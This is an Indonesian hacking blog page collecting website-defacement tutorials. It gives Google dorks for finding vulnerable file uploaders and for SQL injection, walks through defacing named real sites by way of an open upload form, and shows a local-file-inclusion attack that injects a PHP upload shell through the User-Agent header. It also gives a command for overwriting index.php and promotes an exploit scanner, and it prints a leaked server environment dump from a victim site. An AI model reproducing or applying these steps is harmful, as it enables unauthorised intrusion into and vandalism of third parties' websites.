Tampilkan postingan dengan label Defaces. Tampilkan semua postingan

Assalamualaikum... Menjelang datangnya bulan Ramadhan yang besok akan di laksanakan, sebelumnya saya selaku Admin DH mohon maaf jika ada s...

Assalamualaikum...

Menjelang datangnya bulan Ramadhan yang besok akan di laksanakan, sebelumnya saya selaku Admin DH mohon maaf jika ada salah dan khilaf yah,, mungkin emang saya sengaja maupun tidak :)

Oke langsung saja disimak yah :) bisa dah sekedar nambahin unique deface di Arsip sobat :D

Dork :
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable

Ayo mulai :) Silahkan sobat mencari target di google dengan menggunakan Dork diatas.


Disini saya sudah menemukan targetnya, yaitu : http://toptown.co.uk/cgi-bin/filechucker.cgi


Kemudian silahkan sobat isi yang perlu diisi filednya :) | atau bisa lihat screenshot saya di bawah ini


Setelah di isi semuax klik Begin Upload.. Nah, tunggu aja hasilnya :)
Note: File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif


Dan langsung buka file depesan yg sudah diupload tadi : http://toptown.co.uk/upload/files/ajixcrew.html


Sekian tutorialnya dari saya,, maaf kalo masih acak2an :) yang penting bisa bermanfaat :t

Pagi Sobat DetektifH@cking nie ane share Private SQLi dorks ;), silakan di simak ajah dibawah ini :D inurl:group_concat username 0x3a ...


Pagi Sobat DetektifH@cking nie ane share Private SQLi dorks ;), silakan di simak ajah dibawah ini :D

inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php

Semoga bermanfaat :t

Assalamualaikum ^_^ Selamat Pagi Sobat DetektetifH@cking, Nice Friday yeah :D ~ Pada kesempatan kali ini saya akan membagikan tutori...


Assalamualaikum ^_^

Selamat Pagi Sobat DetektetifH@cking, Nice Friday yeah :D ~ Pada kesempatan kali ini saya akan membagikan tutorial yang dikirim oleh teman saya ke kantor DetektifH@cking *cie elaah, bersyukur deh ane yang ngak bisa apa apa, punya banyak temen yang mau berbagi ke DetektifH@cking :D oke langsung saja yeah ;)


Sebelum Bahas Tutorial LFI saya akan Jelasin Singkat Apa Itu LFI ? :)

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. << udah cuma gitu :D Singkat kan ?? :z

Bahan yang Dibutuhkan :
  1. Rokok + Kopi Kapal Api
  2. Camilan
  3. Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
  4. shell / script file upload ..
  5. Dork + Kesabaran Dalam Mencari Site Bug LFI , :D

Dork list :
inurl:.php?(*)=(*)php , inurl:.php?(*)=mapa.php , inurl:.php?caminho=(*)php , inurl:.php?(*)=Sitemap.php
ingat !! Harus Ada .php dibelakang = !!
Misal : inurl:.php?pg=mapa.php << harus ada .php  !!

Trick Search Dork LFI , by ./me !!
  1. buka translate.google.com , xixiixixxiixixi :D
  2. tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
  3. translate text yang sobat tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
  4. masu''kan dork sobat ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
  5. Success !! ;)
Oke Bahan Udah Lengkap + Trick Dork Jadul by ./me , tinggal Tutorialnya aja ya !! Ok Lest Go ;)
1. Kita nemuin website yang vuln LFI.
contoh : http://site.com/main.php?file=news.php

2.list target : http://www.ibriec.org/menara_perkebunan/index.php?open=../../../../../../../../../../proc/self/environ

3.coba kita ganti page_05.php pada list target diatas :
  ../../../../../../../../../proc/self/environ

4. Jika Sobat mendapatkan yang seperti ini :
 SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad
atau keluar : Document ROOT dan ada User Agent Itu Web rentan LFI ,, OK Ternyata proc/self/environ dapat kita akses ! Lest Go ;)

5.Sekarang mari kita injeksi dengan kode dengan meracuni http-headernya/User Agent , Tools yang Tadi (Tamper Data Udah Didownload kan :f ) Ok Kalau Sudah , Lanjut ;)

6.buka tamper data di firefox lalu Buka URL Tadi Yang Rentan LFI , Klik Start Tamper lalu Reload Halaman Site..

7.Muncul Kotak Box , jangan dicentang continue tampering .. , klik TAMPER

8.Pada Kolom/Kotak User agent , Hapus Text Tersebut ganti dengan Code berikut :

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> Mr.Mx4rz Was Here !!</p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" />

*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close

10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut
   Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg

11.Selanjutnya Upload Shell / Script Deface kamu ^_^

12.Success , Tinggal Diacak acak dalemnya :D


Just Hacking And Have Fun :t

Special Thanks to : Mr.Mx4rz atas kirimannya :)

Malam sobat DetektifH@cking,  banyak hacker menemukan masalah besar ketika mereka aka meng-upload shell pada website joomla dan tidak di iz...

Malam sobat DetektifH@cking, banyak hacker menemukan masalah besar ketika mereka aka meng-upload shell pada website joomla dan tidak di izinkan untuk mengedit file seperti " index.php "


Nah skrang ane akan menunjukkan kepada Anda bagaimana bypass the permission !!!!

Hal pertama meng-upload script perl atau python atau cgi seperti yang sobat inginkan. 

kemudian pergi ke arah mana Sobat ingin mengedit (deface) file seperti ini: 

cd / home / user / public_html / 

Kemudian ketik perintah ini: 

echo 'Taruh disini kode deface Sobat'>  / home / user / public_html / index.php

Sekian Trima Kasih.. ;)

Pagi sobat DetektifH@cking  ane share lagi nhe  Program Hacking  =D. Nama-nya  Joomla Security Scanner v 1.0  ini sangat berguna, jika sobat...

Pagi sobat DetektifH@cking ane share lagi nhe Program Hacking =D. Nama-nya Joomla Security Scanner v 1.0 ini sangat berguna, jika sobat ingin menemukan/mengeksploitasi di situs joomla. Enj0y! =D

Screenshot:

Download:
Password: Lihat

Assalamualaikum wr. wb. malam sobat2  DetektifH@cking .. Kali ini ane akan berbagi Cara Mencari Halaman Web Login , kebanyakan saat melak...

Assalamualaikum wr. wb. malam sobat2 DetektifH@cking..

Kali ini ane akan berbagi Cara Mencari Halaman Web Login, kebanyakan saat melakukan eksploitasi web dengan metode SQL Injection, rata rata2 kesulitan menemukan halaman login admin web kan =D, jadi sedikit ane share trik nya yahh.. Okey langsung di simak aja! ;)

Ko' pake Acunetix, iyah ane kadang make untuk melihat struktur dari website tersebut (Crawler) besar kemungkinan dengan fitur crawler kita bisa mendapatkan direktori sensitif dari website target, seperti cgi, admin, dsb. Sedangkan pada tool-tools admin finders kita mencari dengan cara hanya menggunakan list umum seperti : admin, login, system dsb. jadi kita hanya terpatok di list itu ajah. =D

Screenshot: 


Password: Lihat

yup begitu saja yah, moga bermanfaat ;)


"Berbagi Itu Indah"